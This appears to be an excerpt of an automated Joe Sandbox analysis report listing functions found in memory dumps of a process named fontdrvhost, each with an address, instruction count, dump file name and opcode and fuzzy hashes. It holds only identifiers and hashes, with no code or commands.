Instruction ID: fa3d58608ed734737921c2e8e74b2d70f7020155058db200955457796478775d
Opcode Fuzzy Hash: 5ce41b87d711e598a53133db35bf3ebd717a7dd2a5b6b56dae18634578229720
Instruction Fuzzy Hash: 5F21F232B1F98A4FFB69E7A858722BC77A0FF55710F1901BAD01DC76A7DA1869068340

Function 00007FFD9BCDB118 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7885825f89e4b7aa8c6720a6f41dfd8792b53380e93b612faab4e1c130340c68
Instruction ID: a2b5859aa67cd960ebeeb32f5ba6ea0f0895e5b3e6dbe8c40c586a1705a208e1
Opcode Fuzzy Hash: 7885825f89e4b7aa8c6720a6f41dfd8792b53380e93b612faab4e1c130340c68
Instruction Fuzzy Hash: 0D21C534B0D90D4FE768EA2994A27BC73D1FF84310F154278E85ECB2E7DD1AA9428281

Function 00007FFD9BC9BD72 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbac62e7cc15935f1cc1189d5355af3f5305f5bf52fed8338d3397dbef9124e0
Instruction ID: 8332f3a5d20d2bc31954164f109bd91a9204a22ca93559c5d92953be5071bce4
Opcode Fuzzy Hash: fbac62e7cc15935f1cc1189d5355af3f5305f5bf52fed8338d3397dbef9124e0
Instruction Fuzzy Hash: D1210835A0991D9FDFA9DB68C4A5AEDB7B1FF68300F1001ADD05EE3295CA35AA41CB00

Function 00007FFD9BC9B225 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6a92d03e53f6a4603289ed5dc7167366928ef8dcfdf8b44f67a62bb25f98fcb
Instruction ID: d02c01ab06d1e806f270f21d1562e841c07e744d9069b3a29a07fe980a2723af
Opcode Fuzzy Hash: e6a92d03e53f6a4603289ed5dc7167366928ef8dcfdf8b44f67a62bb25f98fcb
Instruction Fuzzy Hash: B6218E30E1D95EDFDB94DBA8D8609EDBBB1FF49301F5101BAD00AE3295DA246942CB50

Function 00007FFD9BC91822 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f44c1d4ba7448527a933ec598c5f66b4d929a521147a856aaacecd48e77afd8
Instruction ID: ac79f0ce9cc3219be8038d82dbbd04d6fef5fbc5237fa888e0bfa1486aa1992c
Opcode Fuzzy Hash: 7f44c1d4ba7448527a933ec598c5f66b4d929a521147a856aaacecd48e77afd8
Instruction Fuzzy Hash: 5E210A71E1981D9FDF98DB58C466AEDB7B1FF68300F0141AED00EE3295CA34AA418B40

Function 00007FFD9BDCCC90 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2939565054.00007FFD9BDC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bdc0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cab5bccc98e8cb21dfeefcf60f26e8ba905f53b60cc3634f438c559e2031fb10
Instruction ID: ab933e54392af380eed6a410f71d51b2e9555de53a1ed0225451b8d6d43c9c28
Opcode Fuzzy Hash: cab5bccc98e8cb21dfeefcf60f26e8ba905f53b60cc3634f438c559e2031fb10
Instruction Fuzzy Hash: 1B1128A494E3C55FC71797348D28064BFB0AF5721570E42EBC4C9CA4B3D619494AC3A2

Function 00007FFD9BC927C9 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eca53b342a9074ac17bf243c164ebcc017882b6599f30de4ce9e6c9cb161bf3
Instruction ID: 67e2ef7898f93ce279157bec518ff3fdb2c39b80049005384fb9045f84c37a58
Opcode Fuzzy Hash: 3eca53b342a9074ac17bf243c164ebcc017882b6599f30de4ce9e6c9cb161bf3
Instruction Fuzzy Hash: FE11E632B0E78D1FF37992E448286BD3BE5DB57350F060076D089EB2A3DD586A4683A1

Function 00007FFD9BC96C69 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12e6211cdad57a629d01a873607787bee6243bb7e1b3a4e9f6ff6fb8eba82366
Instruction ID: e1dd8c9a078ab273b58ca804635e327e704b99460ec14f94643eabfc75076a3e
Opcode Fuzzy Hash: 12e6211cdad57a629d01a873607787bee6243bb7e1b3a4e9f6ff6fb8eba82366
Instruction Fuzzy Hash: 21213D31E1980D9FDFACDB68C466AADB7A1EF58300F4100BDE05FD72A5DE34A9418B00

Function 00007FFD9BC97B85 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5114f3ffb957a769965316aab72f7320dacde68f1aa738eb971810f6025d1291
Instruction ID: e0fc9fe6728a8d1691047cc95e335883e86da2796ec374b6842a2fbaef04f9a1
Opcode Fuzzy Hash: 5114f3ffb957a769965316aab72f7320dacde68f1aa738eb971810f6025d1291
Instruction Fuzzy Hash: 5A112322F0FB8D5FF77096B408681BD2BA1EF56750F0A0477D049D72A2DE5869458381

Function 00007FFD9BC94430 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06dc75420ebef1048db68c24ca04d2e6cba5eca7b16e63f78a9583018f49aab0
Instruction ID: 1fdfffcd703ee9ca33b640a097b3c32ba45751f0ae40b87f75f57732c9646e1e
Opcode Fuzzy Hash: 06dc75420ebef1048db68c24ca04d2e6cba5eca7b16e63f78a9583018f49aab0
Instruction Fuzzy Hash: 9311D620A6D46E97F67C86A884709BD7251FF90301B25867DD49F8B4EECC2CFA819781

Function 00007FFD9BC934B0 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f121cb0ab3274ce0552ee795e6f70386f8ea449caf28d6c0afb2313b0a31e53
Instruction ID: 4a841df0e9eac7b1beae3d9dd4d9f151eb74063970222fdab3f907b6ec17040e
Opcode Fuzzy Hash: 2f121cb0ab3274ce0552ee795e6f70386f8ea449caf28d6c0afb2313b0a31e53
Instruction Fuzzy Hash: 4D110430B1990E4FEB68FB6494219F97391EF94351B410676E04EC35E7DE28B6058791

Function 00007FFD9B8A2A0E Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65f0da805b4f8293d6a01fe0901558d0c3c2aa14cccf17e2438f9fe84c20a017
Instruction ID: 1e37a92f1108567158d7ae153201078fca9b58e65a4170f0b0cbc1f9d07ba2ba
Opcode Fuzzy Hash: 65f0da805b4f8293d6a01fe0901558d0c3c2aa14cccf17e2438f9fe84c20a017
Instruction Fuzzy Hash: 6E111631B1D50E4FEB74EFE8D564AB923D2EF98700F161175D44ED31B2DD28AA418610

Function 00007FFD9B8A294E Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36f7a7067ef66296be83e67e96bfe2c56ce3b6f7f9ad114b5e65fcc87906c1c5
Instruction ID: 0d441764fd58a9cf11069a9753b40a21f9573c5527b96fa60049ab19f1496df2
Opcode Fuzzy Hash: 36f7a7067ef66296be83e67e96bfe2c56ce3b6f7f9ad114b5e65fcc87906c1c5
Instruction Fuzzy Hash: 7A116321F1D91E4EEBB8ABA885686B82291FF4C700F5601B5D44DE32B2EE286E414750

Function 00007FFD9BC9332E Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bae3dc0559f4fad06ede3da2fbb1668713ae3c07d26965b9e6ad8c6c8726e7df
Instruction ID: dbb4d490ddee319c3d3dec801b11e11c52871d9e59c46ca812048b5a1b593e56
Opcode Fuzzy Hash: bae3dc0559f4fad06ede3da2fbb1668713ae3c07d26965b9e6ad8c6c8726e7df
Instruction Fuzzy Hash: 51116B3130950F8FF729AA54D4256FC7390EF95391F16067AE80EC72E2CB29AA50C780

Function 00007FFD9BC986DE Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d61b7a6165a5cf8754dbae75360b12432ae347b198d82ed3d395895626c94e41
Instruction ID: b6ef8a96db6b17056f2b4d39459753629ceb5a5e0f24afacfc4205f94437413d
Opcode Fuzzy Hash: d61b7a6165a5cf8754dbae75360b12432ae347b198d82ed3d395895626c94e41
Instruction Fuzzy Hash: FF116B3170950F8FF728EA64D4256FC7390EF553E1F15067AE409C76E6CB29A640C7A0

Function 00007FFD9BC9886D Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 739ed6b6c859a44c776f2ca01a6caaf5c8761fdcf4d4bd1bec6c4c02300bd321
Instruction ID: b0864ad0bfc298100f5f707763056b3555a36021e8ca70e1f0567a1d72a7cf0a
Opcode Fuzzy Hash: 739ed6b6c859a44c776f2ca01a6caaf5c8761fdcf4d4bd1bec6c4c02300bd321
Instruction Fuzzy Hash: C5010821B2990E4EE72CFB6494219FD7391FF54391B400676E04EC75E7DE28A60587A1

Function 00007FFD9BC96C8E Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a78085b81500868fa687cba67f42b6bc43848df2176fb365209342d019ffbc0b
Instruction ID: c35b63118ce70bd03b22d292afb9aaf76529e49efa0184864304fcec5a9668cb
Opcode Fuzzy Hash: a78085b81500868fa687cba67f42b6bc43848df2176fb365209342d019ffbc0b
Instruction Fuzzy Hash: C8111934A1990D8FDB9CDB68D465AACB7A1FB58310F4100BEE05FE32A5CE34A9818B40

Function 00007FFD9B8A0C38 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cf7fac38be0b719e2a2e78da597fbaee2b06f74ee452445919f72abf18a2d71
Instruction ID: 9ac3c541cd4cbc251a07c5f6224b6dd13425785577213a5030bbe54d2a457c5c
Opcode Fuzzy Hash: 3cf7fac38be0b719e2a2e78da597fbaee2b06f74ee452445919f72abf18a2d71
Instruction Fuzzy Hash: 5C11C631B1E64D9FE7129BB498611AC7BB0EF56711F1641F3D048DB1A2E938270687A1

Function 00007FFD9BC92999 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 104894fbd90a50f49447e412742c558f0dcca7f2bd637a1d1d2683ef4175cd12
Instruction ID: 4794b11bb271edc651f1cff9137a70c441e5dd63a69a6c7c5e2f808901899464
Opcode Fuzzy Hash: 104894fbd90a50f49447e412742c558f0dcca7f2bd637a1d1d2683ef4175cd12
Instruction Fuzzy Hash: 5E012631B0994C4FEB68FBE898625ECB7B0EF09350F05057EE04DC71A7DD2458028700

Function 00007FFD9BC96146 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b547dcd43ed4e0d7ce96b180ec6f0fe14eae1554b575c9c0c0575bbda14e845
Instruction ID: 4ba2f82179a282bf3848065af87173e183cc3a5ff29afd0a7b157bdb98565ae4
Opcode Fuzzy Hash: 5b547dcd43ed4e0d7ce96b180ec6f0fe14eae1554b575c9c0c0575bbda14e845
Instruction Fuzzy Hash: 5E110634F1991EDFDB98DF98D8609BDB7B1FF48340F510179E00AE32A5CA3469018B50

Function 00007FFD9B8A0C40 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbfddfeaa267d28e729fe17836d91b92e0bd3b9bd0f8874342f7d7c21940379e
Instruction ID: 3e904a1ee782e8682a63a6728544e646107bcce8e083584feaf364c0f1230cf8
Opcode Fuzzy Hash: bbfddfeaa267d28e729fe17836d91b92e0bd3b9bd0f8874342f7d7c21940379e
Instruction Fuzzy Hash: D801C431B1E68D9FE712DBB4C8601AD7BB0EF56710F1641F3D048DB1A2D93867498761

Function 00007FFD9BC9607D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 714471fff56ce20def6a3558a3d7a8dfdbd011c325099d38c26d087d45ce6373
Instruction ID: 0755938b51bcd988cf4fc8c34f8630152b3e5c83ce88c4644a050fcd91be8845
Opcode Fuzzy Hash: 714471fff56ce20def6a3558a3d7a8dfdbd011c325099d38c26d087d45ce6373
Instruction Fuzzy Hash: EEF049304593C54FC3029B74CC149927FE4EF4B118B4A42EAD4C9CB562D76C95468752

Function 00007FFD9B8A0C48 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2804fdfcdb19d470f705a12d0aa0a24e155bcdff2af1aaaf6029f1a85358042
Instruction ID: 0a4493e0b465880888e644230c24d33c6eecbec383fc0d44843363002eb8330c
Opcode Fuzzy Hash: e2804fdfcdb19d470f705a12d0aa0a24e155bcdff2af1aaaf6029f1a85358042
Instruction Fuzzy Hash: 07019E31A1E28D9FE712DBB4C86019D7BB0EF16714F1641F3D048DB2A2E9386B458791

Function 00007FFD9BC91667 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1829a01ef305f98acfdaf28004b7e9f1c6d53c5fe090f0bdca42241e57ada0e7
Instruction ID: ec74ce7054023886e6dc1a78a34f2395082be601aaba7e08bda770079bd6ed33
Opcode Fuzzy Hash: 1829a01ef305f98acfdaf28004b7e9f1c6d53c5fe090f0bdca42241e57ada0e7
Instruction Fuzzy Hash: EA01C97094995E8FDFA8DF18C8A5FA8B7B1EB64301F1541EDD00EE3691DA31AA84CF41

Function 00007FFD9BC9176C Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7300a753986a4b978a08133f67d16be19fe705610716b044f626e424526f5509
Instruction ID: d6f533c76d75c5e9b21102b503c6d72c7803b9c3d1827e312263448d7006ad59
Opcode Fuzzy Hash: 7300a753986a4b978a08133f67d16be19fe705610716b044f626e424526f5509
Instruction Fuzzy Hash: 6501BB70908A5DCFDF59DBA8C8A5AACBBF1FF69701F14019DC04AEB251CA31A941DF40

Function 00007FFD9BC91B32 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8caf8b4335caa874dd406095c5ab38d54fcc980100e0e0c3e7b4039d594c7aa
Instruction ID: 8d5ee2c8974429cc882c4f0a2e8beb8ec3f7ce62be2001f85c0156b8930cc1ec
Opcode Fuzzy Hash: d8caf8b4335caa874dd406095c5ab38d54fcc980100e0e0c3e7b4039d594c7aa
Instruction Fuzzy Hash: 39F0963155E3C9AFE3129BB088225E97FB9AF43614B1500E6E489CB0B2D52D1716C761

Function 00007FFD9B8A0C50 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1b14372645c81eff3cf177c0f59ca5e2270dd761942fdc5cbcc389dc57d3379
Instruction ID: 2769d522a5257fcce5726d6835abb193413c3fab21031d1ded393879bf62efd7
Opcode Fuzzy Hash: f1b14372645c81eff3cf177c0f59ca5e2270dd761942fdc5cbcc389dc57d3379
Instruction Fuzzy Hash: BF018F31E1E38D9FE712DBB488601AD7BB0EF1A714F1641E3D048CB2A2E9386B458751

Function 00007FFD9B8A29D4 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 761e2923b077f2d9600d50a95bc5eded3f37b587bffd50bfc0c14b2e65bdc6d3
Instruction ID: 8f3c4e29e3218d286a2320cd147e8819a6e35d3431f55cad53f6d6b2dceab812
Opcode Fuzzy Hash: 761e2923b077f2d9600d50a95bc5eded3f37b587bffd50bfc0c14b2e65bdc6d3
Instruction Fuzzy Hash: 27F03630B1951E4EEB78AF94C9A4AF873A1FF48711F1601B9D48ED31B1DE386A818A10

Function 00007FFD9BC96F62 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85b1b54eb6bdd577952cf64f063a2f634c99d02b0efff603760c35b10ca821c2
Instruction ID: a925a99214e3815ee8e04b2587c0a9b77485c6e7285e875a6d5ceb6cb2f91a6e
Opcode Fuzzy Hash: 85b1b54eb6bdd577952cf64f063a2f634c99d02b0efff603760c35b10ca821c2
Instruction Fuzzy Hash: D5F0FC3554F3CA9FE7228FB0C8615D87FF0EF43240B1A40FAE085C70A2D96C164A8711

Function 00007FFD9BC986B8 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6b0f03b737704dc0d337090b9d03963832a24f2f2b9615ae5c6b30785cf679f
Instruction ID: c8fb3fff1d4b5a83d2a278d8f8afcbe038d3ecf0b345cc10e31766bc118fb30c
Opcode Fuzzy Hash: f6b0f03b737704dc0d337090b9d03963832a24f2f2b9615ae5c6b30785cf679f
Instruction Fuzzy Hash: 9EF0BE11B1F90F8EF73965A098322BD2200AF513C1F22043AD40EAB4FACE196A0193B1

Function 00007FFD9BC9C082 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ffb668ec86854c0ad36b222779c4a69c77199020f791380851a6ec7cb2e62dc
Instruction ID: c3fbf7feb1d9f74f119435de51aeff1c722f3a3199a85d2be4b8d0d07eb90f74
Opcode Fuzzy Hash: 0ffb668ec86854c0ad36b222779c4a69c77199020f791380851a6ec7cb2e62dc
Instruction Fuzzy Hash: CFF0963645E3CA9FF3229BB088255DD7FE0EF03311F1500FAD485C70A2D66C164A8751

Function 00007FFD9B8A2A9A Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 428764437d29e1890ab5c5ac2c1d17129b049794f483ad01c538d826eaafabbb
Instruction ID: ce3496e082ee7735731b01ac1447c5979e161556ccb2a1851e2174fac6fc6218
Opcode Fuzzy Hash: 428764437d29e1890ab5c5ac2c1d17129b049794f483ad01c538d826eaafabbb
Instruction Fuzzy Hash: 5DF05B31B1D40E4AEA78DF94C9A4AB93392FF88711F170175D48EE31F2DE287E418650

Function 00007FFD9B8A0B77 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23b76e65ed5a87d46db7a046b4a8aa6059f24b48ffecfcff494aa6f119830948
Instruction ID: b8435c08b2dd08b616ae4c186d0ce6d359c6b44fead09ed96a85b2a7664a9d0a
Opcode Fuzzy Hash: 23b76e65ed5a87d46db7a046b4a8aa6059f24b48ffecfcff494aa6f119830948
Instruction Fuzzy Hash: CEE06836609A0DCFDB00AF79CCD44D17B90FB0A71AFEA02AED148C7612E2215828CB04

Function 00007FFD9BDCCDC1 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2939565054.00007FFD9BDC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bdc0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01f8badefb1983083f185c487a6dc67bc8db93f6a36530a785f366378ca9e80a
Instruction ID: e13ad2630cdcba8cf96be9b30ac480cf51ef58ecff30db03893218b047a65cd3
Opcode Fuzzy Hash: 01f8badefb1983083f185c487a6dc67bc8db93f6a36530a785f366378ca9e80a
Instruction Fuzzy Hash: 06E09B3091D7058FE3789B64845D1757FE0EF1930171504FFD44DDB5B1EA3665808781

Function 00007FFD9BC91A5F Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24a143d68eda1a2dddb435c6d4210e29b7dc6ac9e2ad97ba99279c220c490a4a
Instruction ID: 8dd4feb82d04f1102d77f9502407a87e5b667889bf1912253eb43a3e0ec21458
Opcode Fuzzy Hash: 24a143d68eda1a2dddb435c6d4210e29b7dc6ac9e2ad97ba99279c220c490a4a
Instruction Fuzzy Hash: 7AF0B27490A95D9FCB55EAA8C85AE99BBB0FF68300F10019DD00ADB262CA219945CF40

Function 00007FFD9BDC570E Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2939565054.00007FFD9BDC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bdc0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2311c50a3f89907cd5dbcb33b462afd9622ffdb3d09168b0b9e3cbf4a4372bc
